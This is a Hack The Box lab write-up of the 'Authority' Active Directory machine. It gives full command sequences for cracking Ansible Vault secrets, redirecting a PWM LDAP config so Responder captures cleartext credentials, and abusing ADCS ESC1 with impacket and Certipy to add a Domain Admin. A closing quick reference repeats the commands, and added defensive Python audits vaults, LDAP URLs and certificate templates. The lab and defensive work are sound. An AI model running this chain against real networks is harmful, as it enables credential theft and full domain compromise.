
HTB: Authority


Authority is a medium Windows Active Directory machine. It starts with SMB anonymous access to a Development share containing Ansible playbooks with Ansible Vault-encrypted credentials. Cracking the vault key with ansible2john + John the Ripper reveals credentials to log into PWM (a password self-service app on port 8443). Modifying the PWM LDAP config to redirect to our machine and running Responder captures svc_ldap's plaintext password. Privilege escalation abuses ADCS ESC1 — we add a domain computer, request an Administrator certificate via Certipy, authenticate to get an LDAP shell, and add our user to Domain Admins.
SMB anon → Development share → Ansible Vault → john → PWM login → Responder → svc_ldap → addcomputer → ADCS ESC1 → Certipy → Domain Admin

Reconnaissance

Nmap

Full port scan reveals a classic Windows Domain Controller fingerprint — DNS, Kerberos, LDAP, SMB, RPC, and an unusual port 8443 running a web app that redirects to /pwm.

nmap — full scan
(SP1R4@kali)-[~/HTB/authority]
└$ nmap -sC -sV -p- 10.10.11.222 --min-rate=500
PORT     STATE SERVICE        VERSION
53/tcp   open  domain         Simple DNS Plus
80/tcp   open  http           Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec   Microsoft Windows Kerberos
135/tcp  open  msrpc          Microsoft Windows RPC
139/tcp  open  netbios-ssn    Microsoft Windows netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds?
636/tcp  open  ldapssl?
3268/tcp open  ldap
8443/tcp open  ssl/https-alt  [redirects to /pwm]
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
hosts
echo "10.10.11.222 authority.htb authority.authority.htb" | sudo tee -a /etc/hosts

SMB Enumeration

SMB allows anonymous login. Listing shares reveals a non-standard Development share alongside the usual AD shares.

smbclient — list shares
(SP1R4@kali)-[~/HTB/authority]
└$ smbclient -L //10.10.11.222/
smbclient — download Development share
(SP1R4@kali)-[~/HTB/authority]
└$ smbclient -N //10.10.11.222/Development
smb: \> recurse on
smb: \> prompt off
smb: \> mget *

The share contains Ansible playbooks under Automation/Ansible/PWM/defaults/. The main.yml files hold credentials encrypted with Ansible Vault.


Cracking Ansible Vault

The vault-encrypted values start with $ANSIBLE_VAULT;1.1;AES256. We use ansible2john to convert them to a John-compatible hash, then crack with rockyou.

ansible2john — convert to hash
(SP1R4@kali)-[~/HTB/authority]
└$ ansible2john pwm_admin_login.txt > vaultpass.hash
john — crack vault password
(SP1R4@kali)-[~/HTB/authority]
└$ john vaultpass.hash --wordlist=/usr/share/wordlists/rockyou.txt
└$ john vaultpass.hash --show

Vault key cracked: !@#$%^&*. Now decrypt the credentials:

ansible-vault decrypt
(SP1R4@kali)-[~/HTB/authority]
└$ cat pwm_admin_login.txt | ansible-vault decrypt
Vault password: !@#$%^&*
Decryption successful
└$ cat pwm_admin_password.txt | ansible-vault decrypt
Vault password: !@#$%^&*
Decryption successful
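The reason ansible2john works at all is the vault envelope format: after the $ANSIBLE_VAULT;1.1;AES256 header, the hex body decodes to salt, HMAC and ciphertext, and the salt/HMAC pair is enough to test candidate passwords offline. From the defender's side the useful tool is an inventory of where such envelopes sit on a share, so that the secrets can be rotated and the files removed. The following Python is an added example, not code from the post: it parses the envelope structure (no decryption), walks a directory tree for vault blobs in YAML or standalone files, and reports the YAML key each one belongs to. The share contents it builds are constructed samples with the same layout as the Development share; the vault payloads are arbitrary bytes, not real encryptions.

```python
import binascii
import pathlib
import re
import tempfile

# Envelope header: $ANSIBLE_VAULT;<format version>;<cipher>[;<vault id>]
VAULT_HEADER = re.compile(
    r"^\$ANSIBLE_VAULT;(?P<ver>1\.[12]);(?P<cipher>[A-Z0-9]+)(?:;(?P<vault_id>.+))?$"
)
HEX_LINE = re.compile(r"^[0-9a-f]+$")


def parse_vault_envelope(text):
    """Parse one vault envelope. The hex body decodes to 'salt\\nhmac\\nciphertext'
    (each part hex again); that salt/HMAC pair is what ansible2john turns into a
    crackable hash. Returns None if the text is not a vault envelope at all."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if not lines:
        return None
    m = VAULT_HEADER.match(lines[0])
    if not m:
        return None
    info = {"version": m["ver"], "cipher": m["cipher"],
            "vault_id": m["vault_id"], "well_formed": False}
    try:
        outer = binascii.unhexlify("".join(lines[1:])).decode("ascii")
        salt, mac, ct = (binascii.unhexlify(h) for h in outer.split("\n"))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return info  # truncated or corrupted envelope
    info.update(well_formed=True, salt_len=len(salt),
                hmac_len=len(mac), ciphertext_len=len(ct))
    return info


def inventory_vault_secrets(root):
    """Walk a directory (e.g. a pulled copy of a share) and report every vault
    envelope with its file, YAML key and envelope diagnostics."""
    root = pathlib.Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
        for i, line in enumerate(lines):
            if not line.strip().startswith("$ANSIBLE_VAULT;"):
                continue
            block = [line.strip()]
            j = i + 1
            while j < len(lines) and HEX_LINE.match(lines[j].strip()):
                block.append(lines[j].strip())
                j += 1
            # A '<key>: !vault |' line directly above names the secret in YAML
            key = None
            if i > 0:
                km = re.match(r"^\s*([\w.-]+)\s*:\s*!vault\b", lines[i - 1])
                if km:
                    key = km.group(1)
            info = parse_vault_envelope("\n".join(block)) or {}
            findings.append({"file": path.relative_to(root).as_posix(),
                             "key": key, **info})
    return findings


def make_sample_envelope(salt, mac, ciphertext):
    """Build a syntactically valid 1.1 envelope from raw bytes. Constructed
    sample only: nothing here is really encrypted."""
    outer = b"\n".join(binascii.hexlify(x) for x in (salt, mac, ciphertext))
    body = binascii.hexlify(outer).decode("ascii")
    wrapped = "\n".join(body[i:i + 80] for i in range(0, len(body), 80))
    return "$ANSIBLE_VAULT;1.1;AES256\n" + wrapped + "\n"


def build_sample_share(root):
    """Write constructed files mirroring the share layout from the write-up."""
    root = pathlib.Path(root)
    defaults = root / "Automation" / "Ansible" / "PWM" / "defaults"
    defaults.mkdir(parents=True)
    env = make_sample_envelope(b"\x01" * 32, b"\x02" * 32, b"\x03" * 16)
    indented = "\n".join("          " + ln for ln in env.strip().splitlines())
    (defaults / "main.yml").write_text(
        "---\npwm_admin_login: !vault |\n" + indented + "\n"
        "pwm_admin_password: !vault |\n" + indented + "\n")
    (root / "pwm_admin_login.txt").write_text(env)
    (root / "broken.txt").write_text(env[:-2])  # truncated: odd hex length


def demo():
    """Inventory the constructed share in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_share(tmp)
        return inventory_vault_secrets(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f)
```

Point inventory_vault_secrets at the directory that mget * produced and every envelope is listed with its owning key; a well_formed of False marks a file that was copied or edited incompletely. The same walk is what a periodic share audit should run before an anonymous-readable share like this one goes unnoticed.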

PWM — Password Self Service (port 8443)

Port 8443 hosts PWM, an open-source LDAP password self-service application. The decrypted credentials grant access as Configuration Manager. PWM shows LDAP connection errors — it is trying to reach ldaps://authority.authority.htb:636 but failing, and we notice user svc_ldap in the bind DN.


LDAP Capture via Responder

The Configuration Manager page allows us to Download and Import the PWM XML config. We modify the LDAP server URL to point to our machine, import the config, then start Responder. Because the new URL uses plain ldap:// instead of ldaps://, the simple bind PWM retries after the import carries the svc_ldap DN and password unencrypted, and Responder's LDAP listener logs them.

config modification — PwmConfiguration.xml
# Change the LDAP URL in PwmConfiguration.xml
<value>ldaps://authority.authority.htb:636</value>
# to:
<value>ldap://<YOUR_IP>:389</value>
# Import modified config via Configuration Manager, then...
responder — capture LDAP bind
(SP1R4@kali)-[~/HTB/authority]
└$ responder -I tun0 -wA
[LDAP] Cleartext Client   : 10.10.11.222
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!
🚩 Plaintext credentials captured: svc_ldap : lDaP_1n_th3_cle4r!
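Two things made this capture possible: the imported config was accepted without review, and the new URL downgraded the bind from ldaps:// to ldap://. The following Python is an added example, not part of the post or of PWM: it audits the LDAP URLs in an exported PwmConfiguration.xml for plaintext schemes and unapproved hosts, and diffs a candidate import against the known-good export. The sample XML is constructed around the one <value> line the post shows; the surrounding element names and setting keys are assumptions, not PWM's real schema, and 192.0.2.10 is a documentation address standing in for the attacker host.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample modelled on the PwmConfiguration.xml excerpt in the
# write-up. Element names and setting keys are assumptions; only the LDAP
# <value> line and the bind DN reflect what the post shows.
BASELINE_CONFIG = """<PwmConfiguration>
  <settings>
    <setting key="ldap.serverUrls">
      <value>ldaps://authority.authority.htb:636</value>
    </setting>
    <setting key="ldap.proxy.username">
      <value>CN=svc_ldap,OU=Service Accounts,DC=authority,DC=htb</value>
    </setting>
  </settings>
</PwmConfiguration>
"""

# The same export after the LDAP URL has been pointed at an outside host over
# plain ldap:// (192.0.2.10 is a documentation address used as a stand-in).
TAMPERED_CONFIG = BASELINE_CONFIG.replace(
    "ldaps://authority.authority.htb:636", "ldap://192.0.2.10:389")

TRUSTED_LDAP_HOSTS = {"authority.authority.htb"}


def ldap_urls(xml_text):
    """Every <value> in the config whose text is an LDAP URL."""
    root = ET.fromstring(xml_text)
    return [(v.text or "").strip() for v in root.iter("value")
            if (v.text or "").strip().lower().startswith(("ldap://", "ldaps://"))]


def audit_ldap_urls(xml_text, trusted_hosts=TRUSTED_LDAP_HOSTS):
    """Return (code, url) findings. PLAINTEXT_BIND: scheme is not ldaps://, so
    the simple bind (DN and password) crosses the wire unencrypted.
    UNTRUSTED_HOST: the target is not an approved directory server."""
    findings = []
    for url in ldap_urls(xml_text):
        parsed = urlparse(url)
        if parsed.scheme.lower() != "ldaps":
            findings.append(("PLAINTEXT_BIND", url))
        if (parsed.hostname or "").lower() not in trusted_hosts:
            findings.append(("UNTRUSTED_HOST", url))
    return findings


def config_drift(baseline_xml, candidate_xml):
    """LDAP URLs a candidate import would add or drop relative to the
    known-good export: the diff to review before accepting an uploaded config."""
    before, after = set(ldap_urls(baseline_xml)), set(ldap_urls(candidate_xml))
    return {"added": sorted(after - before), "removed": sorted(before - after)}


if __name__ == "__main__":
    print("baseline:", audit_ldap_urls(BASELINE_CONFIG))
    print("tampered:", audit_ldap_urls(TAMPERED_CONFIG))
    print("drift:   ", config_drift(BASELINE_CONFIG, TAMPERED_CONFIG))
```

Run against a fresh export and the baseline returns no findings, while the redirected config trips both checks and shows up as one URL added and one removed in the drift report. Restricting who can reach the Configuration Manager at all, and requiring ldaps:// at the directory side, removes the downgrade path entirely.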

Foothold

evil-winrm
(SP1R4@kali)-[~/HTB/authority]
└$ evil-winrm -i 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!'
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> type user.txt
HTB{...}
🚩 User flag captured.

Privilege Escalation — ADCS ESC1

Add a Domain Computer

The domain allows any authenticated user to add computer accounts (ms-DS-MachineAccountQuota is non-zero). We add a fake computer to get a machine account we control.

impacket-addcomputer
(SP1R4@kali)-[~/HTB/authority]
└$ impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' \
     -dc-ip 10.10.11.222 -computer-name 'SP1R4$' -computer-pass 'SP1R4pass1!'
[*] Successfully added machine account SP1R4$ with password SP1R4pass1!.

Find ESC1 via Certipy

Certipy enumerates ADCS certificate templates. It finds a template vulnerable to ESC1 — any Domain Computer can enroll and specify an arbitrary Subject Alternative Name, allowing us to impersonate any user including Administrator.

certipy find — enumerate templates
(SP1R4@kali)-[~/HTB/authority]
└$ certipy find -u 'SP1R4$@authority.htb' -p 'SP1R4pass1!' -dc-ip 10.10.11.222 -vulnerable
[!] Vulnerabilities
    ESC1 - Template allows SAN; enrollment rights for Domain Computers
ESC1 — the template permits enrollees to specify an arbitrary Subject Alternative Name (UPN). By setting UPN to administrator@authority.htb, we obtain a certificate that authenticates as Administrator.
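What certipy find is actually checking is a conjunction of template attributes: the template is published, msPKI-Certificate-Name-Flag has CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set, manager approval and authorized signatures are off, an EKU permits client authentication, and a low-privilege principal holds enrollment rights. Break any one of them and ESC1 is gone. The following Python is an added example, not Certipy's code: it evaluates template dicts against those preconditions and shows two remediations. The templates are constructed; only "CorpVPN allows SAN and is enrollable by Domain Computers" comes from the post, every other attribute value is made up to exercise the checks.

```python
# Flag bits of msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag (MS-CRTD)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002  # "CA certificate manager approval"

# EKUs that make an issued certificate usable for domain logon
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Computers", "Domain Users",
                       "Authenticated Users", "Everyone"}

# Constructed templates (see lead-in): attribute values are illustrative.
SAMPLE_TEMPLATES = {
    "CorpVPN": {"enabled": True, "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
                "enrollment_flag": 0, "ra_signatures": 0,
                "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"],
                "enroll": {"Domain Computers"}},
    "User": {"enabled": True, "name_flag": 0, "enrollment_flag": 0,
             "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"],
             "enroll": {"Domain Users"}},
    "WebServer": {"enabled": True, "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
                  "enrollment_flag": 0, "ra_signatures": 0,
                  "ekus": ["1.3.6.1.5.5.7.3.1"],  # Server Authentication only
                  "enroll": {"Domain Admins"}},
}

ESC1_REQUIRED = {"published", "enrollee_supplies_subject", "no_manager_approval",
                 "no_authorized_signatures", "auth_eku", "low_priv_enrollment"}


def esc1_conditions(t):
    """Return the subset of ESC1 preconditions that template dict t satisfies."""
    met = set()
    if t["enabled"]:
        met.add("published")
    if t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.add("enrollee_supplies_subject")
    if not t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        met.add("no_manager_approval")
    if t["ra_signatures"] == 0:
        met.add("no_authorized_signatures")
    if not t["ekus"] or set(t["ekus"]) & AUTH_EKUS:  # empty EKU list = any purpose
        met.add("auth_eku")
    if set(t["enroll"]) & LOW_PRIV_PRINCIPALS:
        met.add("low_priv_enrollment")
    return met


def is_esc1(t):
    return esc1_conditions(t) == ESC1_REQUIRED


def find_esc1(templates):
    """Names of the templates that satisfy every ESC1 precondition."""
    return sorted(name for name, t in templates.items() if is_esc1(t))


def require_manager_approval(t):
    """Remediation A: hold every request for a certificate manager's review."""
    return {**t, "enrollment_flag": t["enrollment_flag"] | CT_FLAG_PEND_ALL_REQUESTS}


def build_subject_from_ad(t):
    """Remediation B: clear ENROLLEE_SUPPLIES_SUBJECT so the CA builds the
    subject and SAN from the requester's own AD object, not from the CSR."""
    return {**t, "name_flag": t["name_flag"] & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT}


if __name__ == "__main__":
    print("ESC1 templates:", find_esc1(SAMPLE_TEMPLATES))
    for name, t in SAMPLE_TEMPLATES.items():
        print(name, "missing:", sorted(ESC1_REQUIRED - esc1_conditions(t)))
```

Feeding the checker the same attributes certipy find pulls from the pKICertificateTemplate objects reproduces its ESC1 verdict, and the "missing" list for each template tells you which single change closed the hole; on a template like CorpVPN, clearing the supplies-subject flag is the remediation that also removes the attacker's choice of UPN.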

Request Administrator Certificate

certipy req
(SP1R4@kali)-[~/HTB/authority]
└$ certipy req -username 'SP1R4$@authority.htb' -password 'SP1R4pass1!' \
     -ca 'AUTHORITY-CA' -template 'CorpVPN' \
     -upn 'administrator@authority.htb' -dc-ip 10.10.11.222
[*] Saved certificate and private key to 'administrator_authority.pfx'

Authenticate with Certificate — LDAP Shell

certipy auth — ldap-shell
(SP1R4@kali)-[~/HTB/authority]
└$ certipy auth -pfx administrator_authority.pfx -dc-ip 10.10.11.222 -ldap-shell
# Got ldap-shell as Administrator
ldap-shell> add_user sp1r4admin
ldap-shell> change_password sp1r4admin 'Passw0rd123!'
ldap-shell> add_user_to_group sp1r4admin 'Domain Admins'
Successfully added sp1r4admin to Domain Admins.

Root Flag

crackmapexec — domain admin
(SP1R4@kali)-[~/HTB/authority]
└$ crackmapexec winrm 10.10.11.222 -u 'sp1r4admin' -p 'Passw0rd123!' -x 'type C:\Users\Administrator\Desktop\root.txt'
WINRM  10.10.11.222  [+] authority.htb\sp1r4admin:Passw0rd123! (Pwn3d!)
HTB{...}
🚩 Root flag captured. Machine pwned.

Summary

Stage         Technique                                                   Tool
Recon         Full port scan → DC ports + port 8443 (PWM)                 nmap
Enum          SMB anonymous → Development share → Ansible playbooks       smbclient
Cred decrypt  ansible2john → john crack → ansible-vault decrypt           john, ansible
Foothold      PWM config LDAP redirect → Responder → svc_ldap plaintext   responder, evil-winrm
PrivEsc       addcomputer → ADCS ESC1 → certipy req/auth → Domain Admin   impacket, certipy

Key commands

quick reference
# SMB enumeration
smbclient -N //10.10.11.222/Development

# Crack Ansible Vault
ansible2john vault_file.txt > vault.hash && john vault.hash --wordlist=rockyou.txt
cat vault_file.txt | ansible-vault decrypt

# Capture LDAP credentials
responder -I tun0 -wA

# WinRM shell
evil-winrm -i 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!'

# Add machine account
impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222 -computer-name 'SP1R4$' -computer-pass 'SP1R4pass1!'

# ADCS ESC1 exploit
certipy find -u 'SP1R4$@authority.htb' -p 'SP1R4pass1!' -dc-ip 10.10.11.222 -vulnerable
certipy req -username 'SP1R4$@authority.htb' -password 'SP1R4pass1!' -ca 'AUTHORITY-CA' -template 'CorpVPN' -upn 'administrator@authority.htb' -dc-ip 10.10.11.222
certipy auth -pfx administrator_authority.pfx -dc-ip 10.10.11.222 -ldap-shell